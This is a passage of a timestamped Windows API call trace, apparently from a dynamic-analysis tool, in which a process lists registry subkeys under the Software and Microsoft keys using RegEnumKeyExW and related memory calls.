[0085.234] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Netscape", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.235] CoTaskMemFree (pv=0x2baf50)
[0085.235] CoTaskMemFree (pv=0x0)
[0085.235] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.235] RegEnumKeyExW (in: hKey=0x310, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ODBC", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.235] CoTaskMemFree (pv=0x2baf50)
[0085.235] CoTaskMemFree (pv=0x0)
[0085.235] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.235] RegEnumKeyExW (in: hKey=0x310, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Policies", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.235] CoTaskMemFree (pv=0x2baf50)
[0085.235] CoTaskMemFree (pv=0x0)
[0085.235] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.235] RegEnumKeyExW (in: hKey=0x310, dwIndex=0xc, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Wow6432Node", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.235] CoTaskMemFree (pv=0x2baf50)
[0085.235] CoTaskMemFree (pv=0x0)
[0085.235] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.235] RegEnumKeyExW (in: hKey=0x310, dwIndex=0xd, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Classes", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.235] CoTaskMemFree (pv=0x2baf50)
[0085.235] CoTaskMemFree (pv=0x0)
[0085.235] RegOpenKeyExW (in: hKey=0x310, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x3a0) returned 0x0
[0085.235] RegCloseKey (hKey=0x310) returned 0x0
[0085.235] RegQueryInfoKeyW (in: hKey=0x3a0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c93c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c93c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.235] CoTaskMemFree (pv=0x0)
[0085.235] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.235] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Active Setup", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.235] CoTaskMemFree (pv=0x2baf50)
[0085.235] CoTaskMemFree (pv=0x0)
[0085.235] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.235] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ActiveMovie", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.236] CoTaskMemFree (pv=0x2baf50)
[0085.236] CoTaskMemFree (pv=0x0)
[0085.236] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.236] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Advanced INF Setup", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.236] CoTaskMemFree (pv=0x2baf50)
[0085.236] CoTaskMemFree (pv=0x0)
[0085.236] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.236] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ASF Stream Descriptor File", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.236] CoTaskMemFree (pv=0x2baf50)
[0085.236] CoTaskMemFree (pv=0x0)
[0085.236] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.236] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Assistance", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.236] CoTaskMemFree (pv=0x2baf50)
[0085.236] CoTaskMemFree (pv=0x0)
[0085.236] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.236] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Command Processor", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.236] CoTaskMemFree (pv=0x2baf50)
[0085.236] CoTaskMemFree (pv=0x0)
[0085.236] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.236] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="CTF", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.236] CoTaskMemFree (pv=0x2baf50)
[0085.236] CoTaskMemFree (pv=0x0)
[0085.236] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.236] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Direct3D", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.236] CoTaskMemFree (pv=0x2baf50)
[0085.236] CoTaskMemFree (pv=0x0)
[0085.236] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.236] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="EventSystem", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.236] CoTaskMemFree (pv=0x2baf50)
[0085.236] CoTaskMemFree (pv=0x0)
[0085.236] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.236] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Exchange", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.236] CoTaskMemFree (pv=0x2baf50)
[0085.236] CoTaskMemFree (pv=0x0)
[0085.236] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.237] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Fax", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.237] CoTaskMemFree (pv=0x2baf50)
[0085.237] CoTaskMemFree (pv=0x0)
[0085.237] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.237] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Feeds", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.237] CoTaskMemFree (pv=0x2baf50)
[0085.237] CoTaskMemFree (pv=0x0)
[0085.237] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.237] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0xc, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="FTP", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.237] CoTaskMemFree (pv=0x2baf50)
[0085.237] CoTaskMemFree (pv=0x0)
[0085.237] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.237] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0xd, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="GDIPlus", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.237] CoTaskMemFree (pv=0x2baf50)
[0085.237] CoTaskMemFree (pv=0x0)
[0085.237] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.237] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0xe, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IAM", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.237] CoTaskMemFree (pv=0x2baf50)
[0085.237] CoTaskMemFree (pv=0x0)
[0085.237] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.237] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0xf, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IME", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.237] CoTaskMemFree (pv=0x2baf50)
[0085.237] CoTaskMemFree (pv=0x0)
[0085.237] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.237] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x10, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IMEJP", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.237] CoTaskMemFree (pv=0x2baf50)
[0085.237] CoTaskMemFree (pv=0x0)
[0085.237] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.237] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x11, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Connection Wizard", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.237] CoTaskMemFree (pv=0x2baf50)
[0085.237] CoTaskMemFree (pv=0x0)
[0085.237] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.238] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x12, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.238] CoTaskMemFree (pv=0x2baf50)
[0085.238] CoTaskMemFree (pv=0x0)
[0085.238] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.238] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x13, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Mail and News", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.238] CoTaskMemFree (pv=0x2baf50)
[0085.238] CoTaskMemFree (pv=0x0)
[0085.238] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.238] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x14, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Java VM", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.238] CoTaskMemFree (pv=0x2baf50)
[0085.238] CoTaskMemFree (pv=0x0)
[0085.238] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.238] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x15, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Keyboard", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.238] CoTaskMemFree (pv=0x2baf50)
[0085.238] CoTaskMemFree (pv=0x0)
[0085.238] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.238] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x16, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MediaPlayer", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.238] CoTaskMemFree (pv=0x2baf50)
[0085.238] CoTaskMemFree (pv=0x0)
[0085.238] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.238] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x17, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Microsoft Management Console", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.238] CoTaskMemFree (pv=0x2baf50)
[0085.238] CoTaskMemFree (pv=0x0)
[0085.238] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.238] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x18, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MS Design Tools", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.238] CoTaskMemFree (pv=0x2baf50)
[0085.238] CoTaskMemFree (pv=0x0)
[0085.238] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.238] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x19, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MSDAIPP", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.238] CoTaskMemFree (pv=0x2baf50)
[0085.238] CoTaskMemFree (pv=0x0)
[0085.238] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.238] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x1a, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MSF", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.239] CoTaskMemFree (pv=0x2baf50)
[0085.239] CoTaskMemFree (pv=0x0)
[0085.239] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.239] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x1b, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Multimedia", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.239] CoTaskMemFree (pv=0x2baf50)
[0085.239] CoTaskMemFree (pv=0x0)
[0085.239] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.239] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x1c, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Notepad", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.239] CoTaskMemFree (pv=0x2baf50)
[0085.239] CoTaskMemFree (pv=0x0)
[0085.239] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.239] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x1d, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Office", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.239] CoTaskMemFree (pv=0x2baf50)
[0085.239] CoTaskMemFree (pv=0x0)
[0085.239] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.239] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x1e, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OneDrive", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.239] CoTaskMemFree (pv=0x2baf50)
[0085.239] CoTaskMemFree (pv=0x0)
[0085.239] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.239] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x1f, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PeerNet", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.239] CoTaskMemFree (pv=0x2baf50)
[0085.239] CoTaskMemFree (pv=0x0)
[0085.239] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.239] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x20, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Protected Storage System Provider", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.239] CoTaskMemFree (pv=0x2baf50)
[0085.239] CoTaskMemFree (pv=0x0)
[0085.239] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.239] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x21, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="RAS AutoDial", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.239] CoTaskMemFree (pv=0x2baf50)
[0085.239] CoTaskMemFree (pv=0x0)
[0085.239] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.239] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x22, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Remote Assistance", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.239] CoTaskMemFree (pv=0x2baf50)
[0085.239] CoTaskMemFree (pv=0x0)
[0085.240] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.240] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x23, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Shared", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.240] CoTaskMemFree (pv=0x2baf50)
[0085.240] CoTaskMemFree (pv=0x0)
[0085.240] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.240] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x24, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Shared Tools", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.240] CoTaskMemFree (pv=0x2baf50)
[0085.240] CoTaskMemFree (pv=0x0)
[0085.240] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.240] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x25, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SideShow", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.240] CoTaskMemFree (pv=0x2baf50)
[0085.240] CoTaskMemFree (pv=0x0)
[0085.240] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.240] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x26, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SkyDrive", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.240] CoTaskMemFree (pv=0x2baf50)
[0085.240] CoTaskMemFree (pv=0x0)
[0085.240] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.240] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x27, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Speech", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.240] CoTaskMemFree (pv=0x2baf50)
[0085.240] CoTaskMemFree (pv=0x0)
[0085.240] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.240] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x28, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SQMClient", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.240] CoTaskMemFree (pv=0x2baf50)
[0085.240] CoTaskMemFree (pv=0x0)
[0085.240] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.240] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x29, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SystemCertificates", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.240] CoTaskMemFree (pv=0x2baf50)
[0085.240] CoTaskMemFree (pv=0x0)
[0085.240] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.240] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x2a, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="VBA", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.240] CoTaskMemFree (pv=0x2baf50)
[0085.240] CoTaskMemFree (pv=0x0)
[0085.240] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.240] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x2b, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="VisualStudio", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.241] CoTaskMemFree (pv=0x2baf50)
[0085.241] CoTaskMemFree (pv=0x0)
[0085.241] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.241] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x2c, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WAB", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.241] CoTaskMemFree (pv=0x2baf50)
[0085.241] CoTaskMemFree (pv=0x0)
[0085.241] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.241] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x2d, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="wfs", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.241] CoTaskMemFree (pv=0x2baf50)
[0085.241] CoTaskMemFree (pv=0x0)
[0085.241] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.241] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x2e, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.241] CoTaskMemFree (pv=0x2baf50)
[0085.241] CoTaskMemFree (pv=0x0)
[0085.241] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.241] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x2f, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Mail", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.241] CoTaskMemFree (pv=0x2baf50)
[0085.241] CoTaskMemFree (pv=0x0)
[0085.241] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.241] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x30, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Media", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.241] CoTaskMemFree (pv=0x2baf50)
[0085.241] CoTaskMemFree (pv=0x0)
